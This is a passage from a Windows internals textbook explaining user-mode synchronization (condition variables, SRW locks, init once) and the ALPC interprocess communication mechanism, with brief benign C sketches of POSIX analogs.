it has modified the variable. This call releases the critical section or SRW lock of either one or all waiting
threads, depending on which function was used. If this sounds like address-based waiting, it’s because
it is—with the additional guarantee of the atomic compare-and-wait operation. Additionally, condition
variables were implemented before address-based waiting (and thus, before alert-by-ID) and had to
rely on keyed events instead, which were only a close approximation of the desired behavior.
Before condition variables, it was common to use either a notification event or a synchronization
event (recall that these are referred to as auto-reset or manual-reset in the Windows API) to signal the
change to a variable, such as the state of a worker queue. Waiting for a change required a critical section
to be acquired and then released, followed by a wait on an event. After the wait, the critical section
had to be reacquired. During this series of acquisitions and releases, the thread might have switched
contexts, causing problems if one of the threads called PulseEvent (a similar problem to the one that
keyed events solve by forcing a wait for the signaling thread if there is no waiter). With condition
variables, acquisition of the critical section or SRW lock can be maintained by the application while
SleepConditionVariableCS/SRW is called and can be released only after the actual work is done. This
makes writing work-queue code (and similar implementations) much simpler and predictable.
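The pattern described above, holding the lock across the conditional test and releasing it atomically for the duration of the wait, maps directly onto the POSIX analogs of these primitives. A minimal sketch, with pthread_mutex_t standing in for the critical section and pthread_cond_t for the condition variable (the names and the work_ready flag are ours):

```c
#include <pthread.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_cond_t  cond = PTHREAD_COND_INITIALIZER;
static int work_ready = 0;   /* the result of the "conditional test" */
static int work_done  = 0;

static void *worker(void *arg) {
    (void)arg;
    pthread_mutex_lock(&lock);
    /* Equivalent of SleepConditionVariableCS: the lock is held across the
     * test and atomically released for the duration of the wait. */
    while (!work_ready)
        pthread_cond_wait(&cond, &lock);
    work_done = 1;            /* the "actual work", done under the lock */
    pthread_mutex_unlock(&lock);
    return NULL;
}

static int run_queue_demo(void) {
    pthread_t t;
    pthread_create(&t, NULL, worker, NULL);
    pthread_mutex_lock(&lock);
    work_ready = 1;             /* modify the variable under the lock... */
    pthread_mutex_unlock(&lock);
    pthread_cond_signal(&cond); /* ...then ~ WakeConditionVariable */
    pthread_join(t, NULL);
    return work_done;
}
```

Because the test happens under the lock, the worker cannot miss the signal regardless of whether it reaches the wait before or after the producer runs.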
With both SRW locks and critical sections moving to the address-based wait primitives, however,
condition variables can now directly leverage NtWaitForAlertByThreadId and directly signal the
thread, while building a conditional variable wait block that’s structurally similar to the address wait
block we described earlier. The need for keyed events is thus completely elided, and they remain only
for backward compatibility.
Slim Reader/Writer (SRW) locks
Although condition variables are a synchronization mechanism, they are not fully primitive locks
because they do implicit value comparisons around their locking behavior and rely on higher-
level abstractions to be provided (namely, a lock!). Meanwhile, address-based waiting is a primitive
operation, but it provides only the basic synchronization primitive, not true locking. In between these
two worlds, Windows has a true locking primitive, which is nearly identical to a pushlock: the Slim
Reader/Writer lock (SRW lock).
Like their kernel counterparts, SRW locks are also pointer sized, use atomic operations for acquisition
and release, rearrange their waiter lists, protect against lock convoys, and can be acquired both in
shared and exclusive mode. Just like pushlocks, SRW locks can be upgraded, or converted, from shared
to exclusive and vice versa, and they have the same restrictions around recursive acquisition. The only
real difference is that SRW locks are exclusive to user-mode code, whereas pushlocks are exclusive to
kernel-mode code, and the two cannot be shared or exposed from one layer to the other. Because
SRW locks also use the NtWaitForAlertByThreadId primitive, they require no memory allocation and are
guaranteed never to fail (other than through incorrect usage).
Not only can SRW locks entirely replace critical sections in application code, which reduces the need to
allocate the large CRITICAL_SECTION structure (and which previously required the creation of an event
object), but they also offer multiple-reader, single-writer functionality. SRW locks must first be initialized
with InitializeSRWLock or can be statically initialized with a sentinel value, after which they can be ac-
quired or released in either exclusive or shared mode with the appropriate APIs: AcquireSRWLockExclusive,
ReleaseSRWLockExclusive, AcquireSRWLockShared, and ReleaseSRWLockShared. APIs also exist for op-
portunistically trying to acquire the lock, guaranteeing that no blocking operation will occur, as well as
converting the lock from one mode to another.
Note Unlike most other Windows APIs, the SRW locking functions do not return with a
value—instead, they generate exceptions if the lock could not be acquired. This makes
it obvious that an acquisition has failed so that code that assumes success will terminate
instead of potentially proceeding to corrupt user data. Since SRW locks do not fail due to
resource exhaustion, the only such exception possible is STATUS_RESOURCE_NOT_OWNED
in the case that a nonshared SRW lock is incorrectly being released in shared mode.
The Windows SRW locks do not prefer readers or writers, meaning that the performance for either
case should be the same. This makes them great replacements for critical sections, which are writer-
only or exclusive synchronization mechanisms, and they provide an optimized alternative to resources.
If SRW locks were optimized for readers, they would be poor exclusive-only locks, but this isn’t the
case. This is why we earlier mentioned that condition variables can also use SRW locks through the
SleepConditionVariableSRW API. That being said, since keyed events are no longer used in one mecha-
nism (SRW) but are still used in the other (CS), address-based waiting has muted most benefits other
than code size—and the ability to have shared versus exclusive locking. Nevertheless, code targeting
older versions of Windows should use SRW locks to guarantee the increased benefits are there on
kernels that still used keyed events.
Run once initialization
The ability to guarantee the atomic execution of a piece of code responsible for performing some sort
of initialization task—such as allocating memory, initializing certain variables, or even creating objects
on demand—is a typical problem in multithreaded programming. In a piece of code that can be called
simultaneously by multiple threads (a good example is the DllMain routine, which initializes a DLL), there
are several ways of attempting to ensure the correct, atomic, and unique execution of initialization tasks.
For this scenario, Windows implements init once, or one-time initialization (also called run once ini-
tialization internally). The API exists both as a Win32 variant, which calls into Ntdll.dll’s Run Time Library
(Rtl) as all the other previously seen mechanisms do, as well as the documented Rtl set of APIs, which
are exposed to kernel programmers in Ntoskrnl.exe instead (obviously, user-mode developers could
bypass Win32 and use the Rtl functions in Ntdll.dll too, but that is never recommended). The only dif-
ference between the two implementations is that the kernel ends up using an event object for synchro-
nization, whereas user mode uses a keyed event instead (in fact, it passes in a NULL handle to use the
low-memory keyed event that was previously used by critical sections).
Note Since recent versions of Windows now implement an address-based pushlock in
kernel mode, as well as the address-based wait primitive in user mode, the Rtl library could
probably be updated to use RtlWakeAddressSingle and ExBlockOnAddressPushLock, and in
fact a future version of Windows could always do that—the keyed event merely provided a
more similar interface to a dispatcher event object in older Windows versions. As always, do
not rely on the internal details presented in this book, as they are subject to change.
The init once mechanism allows for both synchronous (meaning that the other threads must wait for
initialization to complete) execution of a certain piece of code, as well as asynchronous (meaning that
the other threads can attempt to do their own initialization and race) execution. We look at the logic
behind asynchronous execution after explaining the synchronous mechanism.
In the synchronous case, the developer writes the piece of code that would normally execute after
double-checking the global variable in a dedicated function. Any information that this routine needs
can be passed through the parameter variable that the init once routine accepts. Any output infor-
mation is returned through the context variable. (The status of the initialization itself is returned as
a Boolean.) All the developer has to do to ensure proper execution is call InitOnceExecuteOnce with
the parameter, context, and run-once function pointer after initializing an INIT_ONCE object with
InitOnceInitialize API. The system takes care of the rest.
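The synchronous model has the same shape as POSIX pthread_once; a minimal sketch (the init_count bookkeeping is ours, added only to make the single execution observable):

```c
#include <pthread.h>

static pthread_once_t once = PTHREAD_ONCE_INIT;
static int init_count = 0;

static void do_init(void) {
    /* The "run-once function": executes exactly once; all other callers
     * block until it completes (the synchronous model). */
    init_count++;
}

static int use_resource(void) {
    pthread_once(&once, do_init);  /* ~ InitOnceExecuteOnce */
    return init_count;
}
```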
For applications that want to use the asynchronous model instead, the threads call
InitOnceBeginInitialize and receive a BOOLEAN pending status and the context described earlier. If the
pending status is FALSE, initialization has already taken place, and the thread uses the context value
for the result. (It’s also possible for the function to return FALSE, meaning that initialization failed.)
However, if the pending status comes back as TRUE, the thread should race to be the first to create the
object. The code that follows performs whatever initialization tasks are required, such as creating ob-
jects or allocating memory. When this work is done, the thread calls InitOnceComplete with the result of
the work as the context and receives a BOOLEAN status. If the status is TRUE, the thread won the race,
and the object that it created or allocated is the one that will be the global object. The thread can now
save this object or return it to a caller, depending on the usage.
In the more complex scenario when the status is FALSE, this means that the thread lost the race.
The thread must undo all the work it did, such as deleting objects or freeing memory, and then call
InitOnceBeginInitialize again. However, instead of requesting to start a race as it did initially, it uses the
INIT_ONCE_CHECK_ONLY flag, knowing that it has lost, and requests the winner’s context instead (for
example, the objects or memory that were created or allocated by the winner). This returns another
status, which can be TRUE, meaning that the context is valid and should be used or returned to the
caller, or FALSE, meaning that initialization failed and nobody has been able to perform the work (such
as in the case of a low-memory condition, perhaps).
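The asynchronous race reduces to a compare-and-swap publish: each thread builds a candidate object, one CAS wins, and losers free their work and adopt the winner's object. A portable C11 sketch of that state machine (all names are ours; this is not the InitOnce implementation):

```c
#include <stdatomic.h>
#include <stdbool.h>
#include <stdlib.h>

static _Atomic(void *) global_obj = NULL;

/* Returns true if ours won the race (~ InitOnceComplete returning TRUE),
 * false if another thread's object was already published. */
static bool try_publish(void *ours) {
    void *expected = NULL;
    if (atomic_compare_exchange_strong(&global_obj, &expected, ours))
        return true;            /* we won; ours is now the global object */
    free(ours);                 /* we lost; undo our work... */
    return false;               /* ...and the caller re-reads the winner's */
}

static void *get_object(void) {
    void *obj = atomic_load(&global_obj);
    if (obj != NULL)
        return obj;             /* pending == FALSE: already initialized */
    try_publish(malloc(16));    /* race to initialize */
    return atomic_load(&global_obj);  /* ~ INIT_ONCE_CHECK_ONLY lookup */
}
```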
In both cases, the mechanism for run-once initialization is similar to the mechanism for condition
variables and SRW locks. The init once structure is pointer-size, and inline assembly versions of the SRW
acquisition/release code are used for the noncontended case, whereas keyed events are used when
contention has occurred (which happens when the mechanism is used in synchronous mode) and the
other threads must wait for initialization. In the asynchronous case, the locks are used in shared mode,
so multiple threads can perform initialization at the same time. Although not as highly efficient as the
alert-by-ID primitive, the usage of a keyed event still guarantees that the init once mechanism will func-
tion even in most cases of memory exhaustion.
Advanced local procedure call
All modern operating systems require a mechanism for securely and efficiently transferring data
between one or more processes in user mode, as well as between a service in the kernel and clients in
user mode. Typically, UNIX mechanisms such as mailslots, files, named pipes, and sockets are used for
portability, whereas in other cases, developers can use OS-specific functionality, such as the ubiquitous
window messages used in Win32 graphical applications. In addition, Windows also implements an
internal IPC mechanism called Advanced (or Asynchronous) Local Procedure Call, or ALPC, which is a
high-speed, scalable, and secure facility for passing messages of arbitrary size.
Note ALPC is the replacement for an older IPC mechanism initially shipped with the very
first kernel design of Windows NT, called LPC, which is why certain variables, fields, and
functions might still refer to “LPC” today. Keep in mind that LPC is now emulated on top of
ALPC for compatibility and has been removed from the kernel (legacy system calls still exist,
which get wrapped into ALPC calls).
Although it is internal, and thus not available for third-party developers, ALPC is widely used in vari-
ous parts of Windows:
■ Windows applications that use remote procedure call (RPC), a documented API, indirectly use ALPC when they specify local-RPC over the ncalrpc transport, a form of RPC used to communicate between processes on the same system. This is now the default transport for almost all RPC clients. In addition, when Windows drivers leverage kernel-mode RPC, this implicitly uses ALPC as well, as it is the only transport permitted.

■ Whenever a Windows process and/or thread starts, as well as during any Windows subsystem operation, ALPC is used to communicate with the subsystem process (CSRSS). All subsystems communicate with the session manager (SMSS) over ALPC.

■ When a Windows process raises an exception, the kernel's exception dispatcher communicates with the Windows Error Reporting (WER) Service by using ALPC. Processes also can communicate with WER on their own, such as from the unhandled exception handler. (WER is discussed later in Chapter 10.)

■ Winlogon uses ALPC to communicate with the local security authentication process, LSASS.

■ The security reference monitor (an executive component explained in Chapter 7 of Part 1) uses ALPC to communicate with the LSASS process.

■ The user-mode power manager and power monitor communicate with the kernel-mode power manager over ALPC, such as whenever the LCD brightness is changed.

■ The User-Mode Driver Framework (UMDF) enables user-mode drivers to communicate with the kernel-mode reflector driver by using ALPC.

■ The new Core Messaging mechanism used by CoreUI and modern UWP UI components uses ALPC both to register with the Core Messaging Registrar and to send serialized message objects, which replace the legacy Win32 window message model.

■ The Isolated LSASS process, when Credential Guard is enabled, communicates with LSASS by using ALPC. Similarly, the Secure Kernel transmits trustlet crash dump information through ALPC to WER.

As you can see from these examples, ALPC communication crosses all possible types of security boundaries: from unprivileged applications to the kernel, from VTL 1 trustlets to VTL 0 services, and everything in between. Therefore, security and performance were critical requirements in its design.
Connection model
Typically, ALPC messages are used between a server process and one or more client processes of that
server. An ALPC connection can be established between two or more user-mode processes or between
a kernel-mode component and one or more user-mode processes, or even between two kernel-mode
components (albeit this would not be the most efficient way of communicating). ALPC exposes a single
executive object called the port object to maintain the state needed for communication. Although this
is just one object, there are several kinds of ALPC ports that it can represent:
■ Server connection port: A named port that is a server connection request point. Clients can connect to the server by connecting to this port.

■ Server communication port: An unnamed port a server uses to communicate with one of its clients. The server has one such port per active client.

■ Client communication port: An unnamed port each client uses to communicate with its server.

■ Unconnected communication port: An unnamed port a client can use to communicate locally with itself. This model was abolished in the move from LPC to ALPC but is emulated for Legacy LPC for compatibility reasons.
ALPC follows a connection and communication model that’s somewhat reminiscent of BSD socket
programming. A server first creates a server connection port (NtAlpcCreatePort), whereas a cli-
ent attempts to connect to it (NtAlpcConnectPort). If the server was in a listening state (by using
NtAlpcSendWaitReceivePort), it receives a connection request message and can choose to accept it
(NtAlpcAcceptConnectPort). In doing so, both the client and server communication ports are created,
and each respective endpoint process receives a handle to its communication port. Messages are
then sent across this handle (still by using NtAlpcSendWaitReceivePort), which the server continues to
receive by using the same API. Therefore, in the simplest scenario, a single server thread sits in a loop
calling NtAlpcSendWaitReceivePort, receiving connection requests, which it accepts, or messages,
which it handles and potentially responds to. The server can differentiate between messages by
reading the PORT_HEADER structure, which sits on top of every message and contains a message type.
The various message types are shown in Table 8-30.
TABLE 8-30 ALPC message types

LPC_REQUEST: A normal ALPC message, with a potential synchronous reply

LPC_REPLY: An ALPC message datagram, sent as an asynchronous reply to a previous datagram

LPC_DATAGRAM: An ALPC message datagram, which is immediately released and cannot be synchronously replied to

LPC_LOST_REPLY: Deprecated, used by the Legacy LPC Reply API

LPC_PORT_CLOSED: Sent whenever the last handle of an ALPC port is closed, notifying clients and servers that the other side is gone

LPC_CLIENT_DIED: Sent by the process manager (PspExitThread) using Legacy LPC to the registered termination port(s) of the thread and the registered exception port of the process

LPC_EXCEPTION: Sent by the User-Mode Debugging Framework (DbgkForwardException) to the exception port through Legacy LPC

LPC_DEBUG_EVENT: Deprecated, used by the legacy user-mode debugging services when these were part of the Windows subsystem

LPC_ERROR_EVENT: Sent whenever a hard error is generated from user mode (NtRaiseHardError), delivered using Legacy LPC to the exception port of the target thread, if any, otherwise to the error port, typically owned by CSRSS

LPC_CONNECTION_REQUEST: An ALPC message that represents an attempt by a client to connect to the server's connection port

LPC_CONNECTION_REPLY: The internal message that is sent by a server when it calls NtAlpcAcceptConnectPort to accept a client's connection request

LPC_CANCELED: The received reply by a client or server that was waiting for a message that has now been canceled

LPC_UNREGISTER_PROCESS: Sent by the process manager when the exception port for the current process is swapped to a different one, allowing the owner (typically CSRSS) to unregister its data structures for the thread switching its port to a different one
The server can also deny the connection, either for security reasons or simply due to protocol or
versioning issues. Because clients can send a custom payload with a connection request, this is usu-
ally used by various services to ensure that the correct client, or only one client, is talking to the server.
If any anomalies are found, the server can reject the connection and, optionally, return a payload
containing information on why the client was rejected (allowing the client to take corrective action, if
possible, or for debugging purposes).
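The connect/accept/send-receive flow above can be mirrored with BSD sockets, which it resembles. A sketch over a Linux abstract-namespace Unix-domain socket, with each call annotated with a rough ALPC counterpart; the mapping is approximate (ALPC is message-based, not stream-based), and all names here are ours.

```c
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>

/* Rough mapping: socket+bind+listen ~ NtAlpcCreatePort (server connection
 * port), connect ~ NtAlpcConnectPort (client communication port),
 * accept ~ NtAlpcAcceptConnectPort (server communication port), and
 * send/recv ~ NtAlpcSendWaitReceivePort. */
static int alpc_style_demo(char *reply, size_t len) {
    struct sockaddr_un addr = { .sun_family = AF_UNIX };
    memcpy(addr.sun_path, "\0alpc-demo", 10);  /* Linux abstract name */
    socklen_t alen = offsetof(struct sockaddr_un, sun_path) + 10;

    int server = socket(AF_UNIX, SOCK_STREAM, 0);  /* connection port */
    bind(server, (struct sockaddr *)&addr, alen);
    listen(server, 1);

    int client = socket(AF_UNIX, SOCK_STREAM, 0);  /* client comm port */
    connect(client, (struct sockaddr *)&addr, alen);

    int conn = accept(server, NULL, NULL);         /* server comm port */
    send(client, "ping", 4, 0);                    /* client request */
    char buf[8] = { 0 };
    recv(conn, buf, sizeof buf, 0);                /* server receives... */
    send(conn, "pong", 4, 0);                      /* ...and replies */
    ssize_t n = recv(client, reply, len, 0);
    close(conn);
    close(client);
    close(server);
    return (int)n;
}
```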
Once a connection is made, a connection information structure (actually, a blob, as we describe
shortly) stores the linkage between all the different ports, as shown in Figure 8-40.
FIGURE 8-40 Use of ALPC ports. (The diagram shows the client and server processes, each holding a handle to its communication port and a view of the shared section, with the connection port, the two communication ports, the message queue, and the shared section residing in kernel address space.)
Message model
Using ALPC, a client and a server using blocking messages each take turns performing a loop around the
NtAlpcSendWaitReceivePort system call, in which one side sends a request and waits for a reply while
the other side does the opposite. However, because ALPC supports asynchronous messages, it’s pos-
sible for either side not to block and choose instead to perform some other runtime task and check for
messages later (some of these methods will be described shortly). ALPC supports the following three
methods of exchanging payloads sent with a message:
■ A message can be sent to another process through the standard double-buffering mechanism, in which the kernel maintains a copy of the message (copying it from the source process), switches to the target process, and copies the data from the kernel's buffer. For compatibility, if legacy LPC is being used, only messages of up to 256 bytes can be sent this way, whereas ALPC can allocate an extension buffer for messages up to 64 KB.

■ A message can be stored in an ALPC section object from which the client and server processes map views. (See Chapter 5 in Part 1 for more information on section mappings.)
An important side effect of the ability to send asynchronous messages is that a message can be can-
celed—for example, when a request takes too long or if the user has indicated that they want to cancel
the operation it implements. ALPC supports this with the NtAlpcCancelMessage system call.
An ALPC message can be on one of five different queues implemented by the ALPC port object:
■ Main queue: A message has been sent, and the client is processing it.

■ Pending queue: A message has been sent and the caller is waiting for a reply, but the reply has not yet been sent.

■ Large message queue: A message has been sent, but the caller's buffer was too small to receive it. The caller gets another chance to allocate a larger buffer and request the message payload again.

■ Canceled queue: A message that was sent to the port but has since been canceled.

■ Direct queue: A message that was sent with a direct event attached.
Note that a sixth queue, called the wait queue, does not link messages together; instead, it links all
the threads waiting on a message.
EXPERIMENT: Viewing subsystem ALPC port objects
You can see named ALPC port objects with the WinObj tool from Sysinternals or WinObjEx64
from GitHub. Run one of the two tools elevated as Administrator and select the root directory. A
gear icon identifies the port objects in WinObj, and a power plug in WinObjEx64, as shown here
(you can also click on the Type field to easily sort all the objects by their type):
You should see the ALPC ports used by the power manager, the security manager, and
other internal Windows services. If you want to see the ALPC port objects used by RPC, you can
select the \RPC Control directory. One of the primary users of ALPC, outside of Local RPC, is the
Windows subsystem, which uses ALPC to communicate with the Windows subsystem DLLs that
are present in all Windows processes. Because CSRSS loads once for each session, you will find its
ALPC port objects under the appropriate \Sessions\X\Windows directory, as shown here:
Asynchronous operation
The synchronous model of ALPC is tied to the original LPC architecture in the early NT design and is
similar to other blocking IPC mechanisms, such as Mach ports. Although it is simple to design, a block-
ing IPC algorithm includes many possibilities for deadlock, and working around those scenarios creates
complex code that requires support for a more flexible asynchronous (nonblocking) model. As such,
ALPC was primarily designed to support asynchronous operation as well, which is a requirement for
scalable RPC and other uses, such as support for pending I/O in user-mode drivers. A basic feature of
ALPC, which wasn’t originally present in LPC, is that blocking calls can have a timeout parameter. This
allows legacy applications to avoid certain deadlock scenarios.
However, ALPC is optimized for asynchronous messages and provides three different models for
asynchronous notifications. The first doesn’t actually notify the client or server but simply copies the
data payload. Under this model, it’s up to the implementor to choose a reliable synchronization meth-
od. For example, the client and the server can share a notification event object, or the client can poll for
data arrival. The data structure used by this model is the ALPC completion list (not to be confused with
the Windows I/O completion port). The ALPC completion list is an efficient, nonblocking data struc-
ture that enables atomic passing of data between clients, and its internals are described further in the
upcoming “Performance” section.
The next notification model is a waiting model that uses the Windows completion-port mechanism
(on top of the ALPC completion list). This enables a thread to retrieve multiple payloads at once, control
the maximum number of concurrent requests, and take advantage of native completion-port function-
ality. The user-mode thread pool implementation provides internal APIs that processes use to manage
ALPC messages within the same infrastructure as worker threads, which are implemented using this
model. The RPC system in Windows, when using Local RPC (over ncalrpc), also makes use of this func-
tionality to provide efficient message delivery by taking advantage of this kernel support, as does the
kernel mode RPC runtime in Msrpc.sys.
Finally, because drivers can run in arbitrary context and typically do not like creating dedicated
system threads for their operation, ALPC also provides a mechanism for a more basic, kernel-based
notification using executive callback objects. A driver can register its own callback and context with
NtSetInformationAlpcPort, after which it will get called whenever a message is received. The Power
Dependency Coordinator (Pdc.sys) in the kernel employs this mechanism for communicating with its
clients, for example. It’s worth noting that using an executive callback object has potential advantag-
es—but also security risks—in terms of performance. Because the callbacks are executed in a blocking
fashion (once signaled), and inline with the signaling code, they will always run in the context of an
ALPC message sender (that is, inline with a user-mode thread calling NtAlpcSendWaitReceivePort). This
means that the kernel component can have the chance to examine the state of its client without the
cost of a context switch and can potentially consume the payload in the context of the sender.
The reason these are not absolute guarantees, however (and this becomes a risk if the implementor
is unaware), is that multiple clients can send a message to the port at the same time and existing mes-
sages can be sent by a client before the server registers its executive callback object. It’s also possible
for another client to send yet another message while the server is still processing the first message from
a different client. In all these cases, the server will run in the context of one of the clients that sent a
message but may be analyzing a message sent by a different client. The server should distinguish this
situation (since the Client ID of the sender is encoded in the PORT_HEADER of the message) and attach/
analyze the state of the correct sender (which now has a potential context switch cost).
Views, regions, and sections
Instead of sending message buffers between their two respective processes, a server and client
can choose a more efficient data-passing mechanism that is at the core of the memory manager in
Windows: the section object. (More information is available in Chapter 5 in Part 1.) This allows a piece of
memory to be allocated as shared and for both client and server to have a consistent, and equal, view
of this memory. In this scenario, as much data as can fit can be transferred, and data is merely copied
into one address range and immediately available in the other. Unfortunately, shared-memory com-
munication, such as LPC traditionally provided, has its share of drawbacks, especially when considering
security ramifications. For one, because both client and server must have access to the shared memory,
an unprivileged client can use this to corrupt the server’s shared memory and even build executable
payloads for potential exploits. Additionally, because the client knows the location of the server’s data,
it can use this information to bypass ASLR protections. (See Chapter 5 in Part 1 for more information.)
ALPC provides its own security on top of what’s provided by section objects. With ALPC, a specific
ALPC section object must be created with the appropriate NtAlpcCreatePortSection API, which creates
the correct references to the port, as well as allows for automatic section garbage collection. (A manual
API also exists for deletion.) As the owner of the ALPC section object begins using the section, the al-
located chunks are created as ALPC regions, which represent a range of used addresses within the sec-
tion and add an extra reference to the message. Finally, within a range of shared memory, the clients
obtain views to this memory, which represents the local mapping within their address space.
Regions also support a couple of security options. First, regions can be mapped either using
a secure mode or an unsecure mode. In the secure mode, only two views (mappings) are allowed
to the region. This is typically used when a server wants to share data privately with a single cli-
ent process. Additionally, only one region for a given range of shared memory can be opened from
within the context of a given port. Finally, regions can also be marked with write-access protec-
tion, which enables only one process context (the server) to have write access to the view (by using
MmSecureVirtualMemoryAgainstWrites). Other clients, meanwhile, will have read-only access only.
These settings mitigate many privilege-escalation attacks that could happen due to attacks on shared
memory, and they make ALPC more resilient than typical IPC mechanisms.
Attributes
ALPC provides more than simple message passing; it also enables specific contextual information to
be added to each message and have the kernel track the validity, lifetime, and implementation of
that information. Users of ALPC can assign their own custom context information as well. Whether it’s
system-managed or user-managed, ALPC calls this data attributes. There are seven attributes that the
kernel manages:
■ The security attribute, which holds key information to allow impersonation of clients, as well as
advanced ALPC security functionality (which is described later).
■ The data view attribute, responsible for managing the different views associated with the
regions of an ALPC section. It is also used to set flags such as the auto-release flag, and when
replying, to unmap a view manually.
■ The context attribute, which allows user-managed context pointers to be placed on a port, as
well as on a specific message sent across the port. In addition, a sequence number, message ID,
and callback ID are stored here and managed by the kernel, which allows uniqueness, message-
based hashing, and sequencing to be implemented by users of ALPC.
■ The handle attribute, which contains information about which handles to associate with the
message (which is described in more detail later in the “Handle passing” section).
■ The token attribute, which can be used to get the Token ID, Authentication ID, and Modified ID
of the message sender, without using a full-blown security attribute (but which does not, on its
own, allow impersonation to occur).
■ The direct attribute, which is used when sending direct messages that have a synchronization
object associated with them (described later in the “Direct event” section).
■ The work-on-behalf-of attribute, which is used to encode a work ticket used for better power
management and resource management decisions (see the “Power management” section later).
Some of these attributes are initially passed in by the server or client when the message is sent and
converted into the kernel’s own internal ALPC representation. If the ALPC user requests this data back,
it is exposed back securely. In a few cases, a server or client can always request an attribute, because it
is ALPC that internally associates it with a message and always makes it available (such as the context
or token attributes). By implementing this kind of model and combining it with its own internal handle
table, described next, ALPC can keep critical data opaque between clients and servers while still main-
taining the true pointers in kernel mode.
To define attributes correctly, a variety of APIs are available for internal ALPC consumers, such as
AlpcInitializeMessageAttribute and AlpcGetMessageAttribute.
Blobs, handles, and resources
Although the ALPC subsystem exposes only one Object Manager object type (the port), it internally
must manage a number of data structures that allow it to perform the tasks required by its mecha-
nisms. For example, ALPC needs to allocate and track the messages associated with each port, as well
as the message attributes, which it must track for the duration of their lifetime. Instead of using the
Object Manager’s routines for data management, ALPC implements its own lightweight objects called
blobs. Just like objects, blobs can automatically be allocated and garbage collected, reference tracked,
and locked through synchronization. Additionally, blobs can have custom allocation and deallocation
callbacks, which let their owners control extra information that might need to be tracked for each blob.
Finally, ALPC also uses the executive’s handle table implementation (used for objects and PIDs/TIDs) to
have an ALPC-specific handle table, which allows ALPC to generate private handles for blobs, instead of
using pointers.
In the ALPC model, messages are blobs, for example, and their constructor generates a message ID,
which is itself a handle into ALPC’s handle table. Other ALPC blobs include the following:
■ The connection blob, which stores the client and server communication ports, as well as the
server connection port and ALPC handle table.
■ The security blob, which stores the security data necessary to allow impersonation of a client.
It stores the security attribute.
■ The section, region, and view blobs, which describe ALPC’s shared-memory model. The view
blob is ultimately responsible for storing the data view attribute.
■ The reserve blob, which implements support for ALPC Reserve Objects. (See the “Reserve
objects” section earlier in this chapter.)
■ The handle data blob, which contains the information that enables ALPC’s handle attribute support.
Because blobs are allocated from pageable memory, they must carefully be tracked to ensure their
deletion at the appropriate time. For certain kinds of blobs, this is easy: for example, when an ALPC
message is freed, the blob used to contain it is also deleted. However, certain blobs can represent
numerous attributes attached to a single ALPC message, and the kernel must manage their lifetime
appropriately. For example, because a message can have multiple views associated with it (when many
clients have access to the same shared memory), the views must be tracked with the messages that
reference them. ALPC implements this functionality by using a concept of resources. Each message
is associated with a resource list, and whenever a blob associated with a message (that isn’t a simple
pointer) is allocated, it is also added as a resource of the message. In turn, the ALPC library provides
functionality for looking up, flushing, and deleting associated resources. Security blobs, reserve blobs,
and view blobs are all stored as resources.
Handle passing
A key feature of Unix Domain Sockets and Mach ports, which are the most complex and most used
IPC mechanisms on Linux and macOS, respectively, is the ability to send a message that encodes a file
descriptor which will then be duplicated in the receiving process, granting it access to a UNIX-style file
(such as a pipe, socket, or actual file system location). With ALPC, Windows can now also benefit from
this model, with the handle attribute exposed by ALPC. This attribute allows a sender to encode an
object type, some information about how to duplicate the handle, and the handle index in the table of
the sender. If the handle index matches the type of object the sender is claiming to send, a duplicated
handle is created, for the moment, in the system (kernel) handle table. This first part guarantees that
the sender truly is sending what it is claiming, and that at this point, any operation the sender might
undertake does not invalidate the handle or the object beneath it.
Next, the receiver requests exposing the handle attribute, specifying the type of object they expect.
If there is a match, the kernel handle is duplicated once more, this time as a user-mode handle in the
table of the receiver (and the kernel copy is now closed). The handle passing has been completed, and
the receiver is guaranteed to have a handle to the exact same object the sender was referencing and of
the type the receiver expects. Furthermore, because the duplication is done by the kernel, it means a
privileged server can send a message to an unprivileged client without requiring the latter to have any
type of access to the sending process.
This handle-passing mechanism, when first implemented, was primarily used by the Windows
subsystem (CSRSS), which needs to be made aware of any child processes created by existing Windows
processes, so that they can successfully connect to CSRSS when it is their turn to execute, with CSRSS
already knowing about their creation from the parent. It had several issues, however, such as the inabil-
ity to send more than a single handle (and certainly not more than one type of object). It also forced
receivers to always receive any handle associated with a message on the port without knowing ahead
of time if the message should have a handle associated with it to begin with.
To rectify these issues, Windows 8 and later now implement the indirect handle passing mechanism,
which allows sending multiple handles of different types and allows receivers to manually retrieve han-
dles on a per-message basis. If a port accepts and enables such indirect handles (non-RPC-based ALPC
servers typically do not use indirect handles), handles will no longer be automatically duplicated based
on the handle attribute passed in when receiving a new message with NtAlpcSendWaitReceivePort—
instead, ALPC clients and servers will have to manually query how many handles a given message con-
tains, allocate sufficient data structures to receive the handle values and their types, and then request
the duplication of all the handles, parsing the ones that match the expected types (while closing/drop-
ping unexpected ones) by using NtAlpcQueryInformationMessage and passing in the received message.
This new behavior also introduces a security benefit—instead of handles being automatically dupli-
cated as soon as the caller specifies a handle attribute with a matching type, they are only duplicated
when requested on a per-message basis. Because a server might expect a handle for message A, but
not necessarily for all other messages, nonindirect handles can be problematic if the server doesn’t
think of closing any possible handle even while parsing message B or C. With indirect handles, the
server would never call NtAlpcQueryInformationMessage for such messages, and the handles would
never be duplicated (or necessitate closing them).
Due to these improvements, the ALPC handle-passing mechanism is now exposed beyond just the
limited use-cases described and is integrated with the RPC runtime and IDL compiler. It is now possible
to use the system_handle(sh_type) syntax to indicate more than 20 different handle types that the RPC
runtime can marshal from a client to a server (or vice-versa). Furthermore, although ALPC provides
the type checking from the kernel’s perspective, as described earlier, the RPC runtime itself also does
additional type checking—for example, while named pipes, sockets, and actual files are all “File
Objects” (and thus handles of type “File”), the RPC runtime can do marshalling and unmarshalling
checks to specifically detect whether a Socket handle is being passed when the IDL file indicates sys-
tem_handle(sh_pipe), for example (this is done by calling APIs such as GetFileAttribute, GetDeviceType,
and so on).
This new capability is heavily leveraged by the AppContainer infrastructure and is the key way
through which the WinRT API transfers handles that are opened by the various brokers (after do-
ing capability checks) and duplicated back into the sandboxed application for direct use. Other
RPC services that leverage this functionality include the DNS Client, which uses it to populate the
ai_resolutionhandle field in the GetAddrInfoEx API.
Security
ALPC implements several security mechanisms, full security boundaries, and mitigations to prevent at-
tacks in case of generic IPC parsing bugs. At a base level, ALPC port objects are managed by the same
Object Manager interfaces that manage object security, preventing nonprivileged applications from
obtaining handles to server ports with ACL. On top of that, ALPC provides a SID-based trust model,
inherited from the original LPC design. This model enables clients to validate the server they are con-
